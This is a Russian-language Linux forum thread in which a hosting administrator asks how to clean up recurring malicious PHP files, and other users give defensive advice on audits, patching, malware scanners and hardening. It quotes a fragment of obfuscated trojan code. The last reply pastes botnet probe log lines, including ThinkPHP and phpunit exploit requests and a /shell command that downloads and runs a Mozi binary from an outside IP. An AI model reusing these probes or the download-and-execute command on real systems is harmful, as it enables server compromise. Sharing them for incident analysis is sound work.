LINUX.ORG.RU

Вирус (kindex.php, bindex.php и т.д.)

 


1

4

Добрый день! Кто сталкивался с подобными вредоносными файлами в каталогах Ваших сайтов. В последнее время на нескольких моих серверах у клиентов появляются вредоносные php файлы: bindex.php kindex.php windex.php wp-load.php pig.php pop.php gank.php.PhP accesson0.php и каталог wp-admin с текстовыми файлами внутри Если удалить эти файлы, то со временем они появляются, антивирус вообще их игнорирует. Пароли все помененны. Кто сталкивался с этой заразой, как лечили ?

Кто сталкивался с этой заразой, как лечили ?

Переходом с PHP-помойки для изготовления сайтов на какую-либо зрелую технологию. Пример – ЛОР.

EXL ★★★★★
()

Кто сталкивался с этой заразой, как лечили

Элементарно. Меняешь пароли, всё вычищаешь, потом накатываешь из бекапа на локалку, накатываешь обновления и, в завершении, заливаешь на хостинг.

crutch_master ★★★★★
()

Обратитесь к администратору сайтов, он посмотрит.

anonymous
()

Поставил на аудит дерикторию с сайтом, что-бы узнать какой процесс и кем создаются данные файлы, отпишу как что-то узнаю.

vestrum
() автор топика
Ответ на: комментарий от vestrum

Подписался, чтоб не пропустить, интересно

d09
()
Ответ на: комментарий от fernandos

спасибо за ссылку, но к сожалению там ничего нет, прикол в том, что сайтов на вордпрессе как раз и нет, а файлы типа wp-load.php и директория wp-admin появляются. Явно что-то взломали, интересно просто что, и как.

vestrum
() автор топика
Ответ на: комментарий от fernandos

Даёшь вирусы на пиэйчпи!

Эм, рынок подобных PHP-вирусов наверное даже обширнее чем то, что происходит в зоопарке Microsoft Windows.

На хосты сайтов к нерадивым Web-мастерам постоянно подкидывают шеллы, майнеры, рекламоспамилки и пр. троянцев.

EXL ★★★★★
()
Последнее исправление: EXL (всего исправлений: 1)
Ответ на: комментарий от vestrum

Да ересь несусветная. типа: ($FILL8I8L8I=«81h_g5f4z9w2amcse0xvipylj3doubktr7q6n-»;$F8I8L8LIIL=$FILL8I8L8I{6}.$FILL8I8L8I{20}.$FILL8I8L8I{23}.)

Это не ересь, а кусок сжатого кода трояна:

https://webcache.googleusercontent.com/search?q=cache:7DjoCEk_jjwJ:https://malwaredecoder.com/result/d411ab66050738cfd934657291b54968+&cd=1&hl=en&ct=clnk&gl=ru&client=firefox-b-d

EXL ★★★★★
()
Ответ на: комментарий от vestrum

Это не ересь, это код.

php > $a = "81h_g5f4z9w2amcse0xvipylj3doubktr7q6n-";
php > echo $a{6}.$a{20}.$a{23};
fil

Так потихоньку можно собрать программку.

anonymous
()
Ответ на: комментарий от EXL

Переходом с PHP-помойки для изготовления сайтов на какую-либо зрелую технологию

А без особой разницы. Хотя PHP такое себе…

Если абы как что налеплено, то это не поможет. Разве что Джо придёт на помощь.

fornlr ★★★★★
()
Последнее исправление: fornlr (всего исправлений: 1)
Ответ на: комментарий от fernandos

с большой частью разработчиков

Где-то несколько лет назад позитивщики оценивали. Где-то половина инстансов на линуксе это решето с 1-day дырками.

Вот такая вот реальность. Хотя своим локальным локалхостом можешь гордится.

fornlr ★★★★★
()
Ответ на: комментарий от Aleksandra

ТС отписался что сайты у него вообще не на WordPress: Вирус (kindex.php, bindex.php и т.д.) (комментарий)

Там просто ботнет какой-то по площадям кроет через дырки в PHP, предполагая что у ТС стоит WordPress, хотя у него сайты наверняка на каком-то дыряво-самописном CMS.

Тут бы желательно всю инфу узнать:

Дистр, версия PHP, версия Apache или Nginx и пр.

EXL ★★★★★
()
Ответ на: комментарий от EXL

ТС отписался что сайты у него вообще не на WordPress: Вирус (kindex.php, bindex.php и т.д.) (комментарий)

Там просто ботнет какой-то по площадям кроет через дырки в PHP, предполагая что у ТС стоит WordPress, хотя у него сайты наверняка на каком-то дыряво-самописном CMS.

Не увидела его ответ. Очень может быть.

Aleksandra
()
Ответ на: комментарий от EXL

Тут бы желательно всю инфу узнать:

Дистр, версия PHP, версия Apache или Nginx и пр.

Или с правами что-то намудрено, это как вариант тоже исключать нельзя.

Aleksandra
()

Берешь свою cms, идешь на https://cve.mitre.org, читаешь, плачешь, латаешь дыры (платишь тому, кто залатает их за тебя). Чистишь говно которое тебе залили. Профит.

slowpony ★★★★★
()

Рекомендую ещё посмотреть логи веб сервера, особенно на ошибки и встречаются ли там обращения к этим файлам.

Меня когда-то так поломали через открытый наружу webmin :))

skyman ★★★
()

LINUX MALWARE DETECT (LMD)

Всем хостерам на *NIX надо прочесть эту страничку: https://www.rfxn.com/projects/linux-malware-detect/

Пользователям ClamAV желательно но добавить базы от LMD:

https://www.rfxn.com/downloads/rfxn.ndb

https://www.rfxn.com/downloads/rfxn.ndb.md5

https://www.rfxn.com/downloads/rfxn.hdb

https://www.rfxn.com/downloads/rfxn.hdb.md5

К большому сожалению проект LMD PGP подписи на сканер и базы не предоставляет.

Аудит, если правильно и сразу настроен, то поможет найти виновного.

Защити каталог со скриптами режимом RX без права записи, а каталог с базами RW без права исполнения от туда PHP скриптов.

anonymous
()
Ответ на: комментарий от EXL

Переходом с PHP-помойки для изготовления сайтов на какую-либо зрелую технологию. Пример – ЛОР.

Ага, на питон или, упаси Господи, на джаву.

Владимир Владимирович из Кремля

anonymous
()
  1. ftp сервер вообще удалить
  2. ssh только по ключу
  3. К apache/nginx прикрутить waf (например modesecurity)

Это на будущее - когда то что уже заражено спецы Вам вычистят.

suffix ★★
()

Благодарю Всех за ответы, не ожидал что так быстро и много откликнуться людей. Если будут какието результаты от аудита, сообщу.

vestrum
() автор топика

Быть может в бд нужно искать концы?

jangles
()

Не забудь обновить плагины, меня ломали через плагины раз 5.

jangles
()

Панель управления хостингом на серваках стоит? Я бы с этого начал, особенно, если там какая-нибудь VestaCP.

Ну, а так верно все - логи смотреть, аудит делать. Зловред вообще мог через дыру никак не связанную с PHP проникнуть.

Stack77
()

Похоже сайт на вордпресе и скорее всего какой нибудь плагин стоит в этом вордпресе который это все мутит. Нужно зайти в админку вордпреса и удалить этот плагин

romanlinux ★★★
()
Ответ на: комментарий от EXL

Пример – ЛОР

Франкенштейн из жабы с кусками скалы? Ну такое

upcFrost ★★★★★
()
Ответ на: комментарий от EXL

Там просто ботнет какой-то по площадям кроет через дырки в PHP, предполагая что у ТС стоит WordPress

Ботнеты постоянно заглядывают. Два три раза в сутки. Известные уязвимости в PHP уже можно по access_log учить

GET /config/getuser?index=0 HTTP/1.1 400 271 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 
GET /login HTTP/1.1 404 9 "-" "observer v1.0"
POST /api/jsonws/invoke HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
POST /mifs/.;/services/LogService HTTP/1.1 404 9 "https://34.90.168.93:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /console/ HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.59.36.110:42935/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 404 169 "-" "Hello, world"
kostyarin_ ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.